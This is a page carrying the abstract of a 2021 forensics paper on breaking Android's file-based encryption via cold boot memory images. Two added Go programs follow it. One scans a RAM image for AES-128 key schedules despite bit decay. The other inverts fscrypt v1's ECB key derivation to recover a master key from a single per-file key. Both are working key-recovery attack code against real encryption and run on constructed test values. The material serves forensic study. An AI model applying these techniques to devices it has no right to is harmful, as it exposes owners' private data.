One key to rule them all: Recovering the master key from RAM to break Android's file-based encryption (2021)

https://www.sciencedirect.com/science/article/pii/S266628172100007X

Forensic Science International: Digital Investigation (Elsevier), Volume 36, Supplement

Open access, under a Creative Commons license (CC BY-NC-ND 4.0, http://creativecommons.org/licenses/by-nc-nd/4.0/)

Abstract

As has been known for a decade, cold boot attacks can break software-based disk encryption when an attacker has physical access to a powered-on device, including Android smartphones. Raw memory images can be obtained by resetting a device and rebooting it with a malicious boot loader or, on systems where this is not possible due to secure boot or restrictive BIOS settings, by physically transplanting the RAM modules into a system under the attacker's control. Based on the memory images of a device, different key recovery algorithms have been proposed in the past to break Full Disk Encryption (FDE), including BitLocker, dm-crypt, and also Android's FDE. With Google's switch from FDE to File-based Encryption (FBE) as the standard encryption method for recent Android devices, however, existing tools have been rendered ineffective. To close this gap, and to re-enable the forensic analysis of encrypted Android disks given a raw memory image, we present a new key recovery method tailored for FBE. Furthermore, we extend The Sleuth Kit (TSK) to automatically decrypt file names and file contents when working on FBE-enabled EXT4 images, as well as the Plaso framework to extract events from encrypted EXT4 partitions. Last but not least, we argue that the recovery of master keys from FBE partitions was particularly easy due to a flaw in Google's key derivation method.
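The abstract's starting point is key recovery from a raw memory image. The block below is an added example, not code from the paper, of the established cold boot technique that the earlier FDE tools are built on (Halderman et al.'s AES key-schedule search, as implemented in aeskeyfind): a software AES implementation keeps its 176-byte expanded key schedule in RAM, so any 16-byte window whose following 160 bytes equal its own FIPS-197 expansion is a live key. The abstract does not describe the paper's FBE-specific method, and this example does not claim to reproduce it. Everything here is constructed: the image is seeded pseudo-random filler with the FIPS-197 sample key's schedule embedded, decay during a RAM transplant is mimicked by flipping a few schedule bits, and the candidate key bytes themselves are assumed intact (a simplification of the full error-correcting search).

```go
// Cold-boot-style AES-128 key recovery from a raw memory image (added example,
// not the paper's code). Finds windows followed by their own key schedule.
package main

import (
	"encoding/hex"
	"fmt"
	"math/bits"
	"math/rand"
)

const scheduleLen = 176 // 11 round keys of 16 bytes for AES-128

var sbox = makeSbox()

func rotl8(x byte, n uint) byte { return x<<n | x>>(8-n) }

// makeSbox computes the AES S-box: multiplicative inverse in GF(2^8), then the affine map.
func makeSbox() [256]byte {
	var s [256]byte
	p, q := byte(1), byte(1) // invariant: p*q == 1 in GF(2^8)
	for {
		if p&0x80 != 0 { // p *= 3
			p = p ^ p<<1 ^ 0x1B
		} else {
			p = p ^ p<<1
		}
		q ^= q << 1 // q /= 3 (multiply by 0xF6)
		q ^= q << 2
		q ^= q << 4
		if q&0x80 != 0 {
			q ^= 0x09
		}
		s[p] = q ^ rotl8(q, 1) ^ rotl8(q, 2) ^ rotl8(q, 3) ^ rotl8(q, 4) ^ 0x63
		if p == 1 {
			break
		}
	}
	s[0] = 0x63 // zero has no inverse
	return s
}

// expandKey128 is the FIPS-197 key expansion; the schedule starts with the key itself.
func expandKey128(key []byte) []byte {
	w := make([]byte, scheduleLen)
	copy(w, key)
	rcon := byte(0x01)
	for i := 4; i < 44; i++ {
		var t [4]byte
		copy(t[:], w[(i-1)*4:i*4])
		if i%4 == 0 {
			t = [4]byte{sbox[t[1]], sbox[t[2]], sbox[t[3]], sbox[t[0]]} // RotWord + SubWord
			t[0] ^= rcon
			if rcon&0x80 != 0 {
				rcon = rcon<<1 ^ 0x1B
			} else {
				rcon <<= 1
			}
		}
		for j := 0; j < 4; j++ {
			w[i*4+j] = w[(i-4)*4+j] ^ t[j]
		}
	}
	return w
}

// bitErrors counts differing bits between two equal-length slices.
func bitErrors(a, b []byte) int {
	n := 0
	for i := range a {
		n += bits.OnesCount8(a[i] ^ b[i])
	}
	return n
}

// findAES128Keys returns the offset of every window whose expansion matches the bytes
// that follow it, tolerating up to maxBitErrors decayed bits in the stored round keys.
func findAES128Keys(image []byte, maxBitErrors int) []int {
	var hits []int
	for off := 0; off+scheduleLen <= len(image); off++ {
		c := image[off : off+16]
		// Cheap prefilter: recompute only w[4] before paying for a full expansion.
		w4 := [4]byte{c[0] ^ sbox[c[13]] ^ 0x01, c[1] ^ sbox[c[14]], c[2] ^ sbox[c[15]], c[3] ^ sbox[c[12]]}
		if bitErrors(w4[:], image[off+16:off+20]) > maxBitErrors {
			continue
		}
		if bitErrors(expandKey128(c), image[off:off+scheduleLen]) <= maxBitErrors {
			hits = append(hits, off)
		}
	}
	return hits
}

// buildSampleImage is the constructed RAM image: seeded pseudo-random filler with key's
// schedule at keyOffset; flippedBits are bit indices relative to the schedule start.
func buildSampleImage(key []byte, keyOffset, size int, flippedBits ...int) []byte {
	img := make([]byte, size)
	rand.New(rand.NewSource(1)).Read(img)
	copy(img[keyOffset:], expandKey128(key))
	for _, b := range flippedBits {
		img[keyOffset+b/8] ^= byte(1) << uint(b%8)
	}
	return img
}

func main() {
	key, _ := hex.DecodeString("2b7e151628aed2a6abf7158809cf4f3c") // FIPS-197 sample key
	clean := buildSampleImage(key, 0x2A40, 16384)
	fmt.Println("clean image, exact match at:", findAES128Keys(clean, 0))
	decayed := buildSampleImage(key, 0x2A40, 16384, 130, 700, 1300)
	fmt.Println("decayed image, exact match at:", findAES128Keys(decayed, 0))
	hits := findAES128Keys(decayed, 3)
	fmt.Println("decayed image, <=3 bit errors, match at:", hits)
	fmt.Printf("recovered key: %x\n", decayed[hits[0]:hits[0]+16])
}
```

The prefilter is what makes a scan over gigabytes of RAM practical: a random window survives it with probability about 2^-32 at zero tolerance, so the full expansion is computed almost only for true keys. Run against a real image, the same scan also reports the schedules of keys the kernel's crypto layer cached, which is exactly why the abstract treats a memory image as sufficient to break software-based encryption.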
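The abstract names the weakness only as a flaw in Google's key derivation. The per-file key derivation of fscrypt v1, the Linux kernel facility that Android's FBE is built on, is AES-128-ECB with the inode's nonce as the AES key and the master key as the plaintext (the kernel's derive_key_aes). Since the nonce is stored unencrypted in the inode's encryption xattr, that derivation is invertible by anyone holding a single per-file key. The following added example (not the paper's code) reproduces the derivation with Go's crypto/aes and shows the inversion; the function names are the example's own and every key and nonce value is a constructed test vector, not a device key.

```go
// fscrypt v1 per-file key derivation and its inversion (added example, not the
// paper's code). The secret is the plaintext and the public nonce is the key.
package main

import (
	"bytes"
	"crypto/aes"
	"encoding/hex"
	"fmt"
)

const (
	nonceLen     = 16 // per-file nonce kept in the inode's encryption xattr
	masterKeyLen = 64 // FS_MAX_KEY_SIZE: raw master key, enough for AES-256-XTS
)

// ecb runs single-block AES under key over every 16-byte block of in, with no IV
// and no chaining, so each output block depends on its own input block alone.
func ecb(key, in []byte, decrypt bool) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	bs := block.BlockSize()
	if len(in)%bs != 0 {
		return nil, fmt.Errorf("input length %d is not a multiple of %d", len(in), bs)
	}
	out := make([]byte, len(in))
	for i := 0; i < len(in); i += bs {
		if decrypt {
			block.Decrypt(out[i:i+bs], in[i:i+bs])
		} else {
			block.Encrypt(out[i:i+bs], in[i:i+bs])
		}
	}
	return out, nil
}

// deriveFileKeyV1 mirrors fscrypt v1's derive_key_aes: AES-128-ECB with the
// nonce as the key and the master key as the plaintext.
func deriveFileKeyV1(masterKey, nonce []byte) ([]byte, error) {
	if len(nonce) != nonceLen || len(masterKey) != masterKeyLen {
		return nil, fmt.Errorf("need a %d-byte nonce and a %d-byte master key", nonceLen, masterKeyLen)
	}
	return ecb(nonce, masterKey, false)
}

// recoverMasterKeyV1 is the attack: a per-file key found in RAM plus the nonce
// read from the inode on disk gives the master key back with one ECB decryption.
func recoverMasterKeyV1(fileKey, nonce []byte) ([]byte, error) {
	if len(nonce) != nonceLen || len(fileKey) != masterKeyLen {
		return nil, fmt.Errorf("need a %d-byte nonce and a %d-byte per-file key", nonceLen, masterKeyLen)
	}
	return ecb(nonce, fileKey, true)
}

// mustHex decodes the constructed test vectors used below.
func mustHex(s string) []byte {
	b, err := hex.DecodeString(s)
	if err != nil {
		panic(err)
	}
	return b
}

func main() {
	master := mustHex( // constructed 64-byte master key, not a real one
		"000102030405060708090a0b0c0d0e0f" +
			"101112131415161718191a1b1c1d1e1f" +
			"202122232425262728292a2b2c2d2e2f" +
			"303132333435363738393a3b3c3d3e3f")
	nonceA := mustHex("a0a1a2a3a4a5a6a7a8a9aaabacadaeaf") // file A's on-disk nonce
	nonceB := mustHex("b0b1b2b3b4b5b6b7b8b9babbbcbdbebf") // file B's on-disk nonce

	keyA, _ := deriveFileKeyV1(master, nonceA) // what the attacker finds in RAM
	keyB, _ := deriveFileKeyV1(master, nonceB) // never observed by the attacker

	recovered, _ := recoverMasterKeyV1(keyA, nonceA)
	fmt.Println("master key recovered from file A's key:", bytes.Equal(recovered, master))
	keyB2, _ := deriveFileKeyV1(recovered, nonceB)
	fmt.Println("file B's key re-derived from the recovered master:", bytes.Equal(keyB2, keyB))
}
```

A proper KDF would run the master key through a one-way function keyed or salted by the nonce, so that a leaked per-file key reveals nothing about the master key; fscrypt v2 does this with HKDF-SHA512. Under v1, by contrast, the block-by-block ECB structure also means a recovered 32-byte prefix of a per-file key already yields the first 32 bytes of the master key.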

Keywords: Android; EXT4; File-based encryption (FBE); Disk forensics; Memory forensics; Cold boot attacks


© 2021 The Authors. Published by Elsevier Ltd.

Hacker News discussion (54 points, 14 comments, submitted by thunderbong on 2024-05-02): https://news.ycombinator.com/item?id=40235193
Authors: Tobias Groß, Marcel Busch, Tilo Müller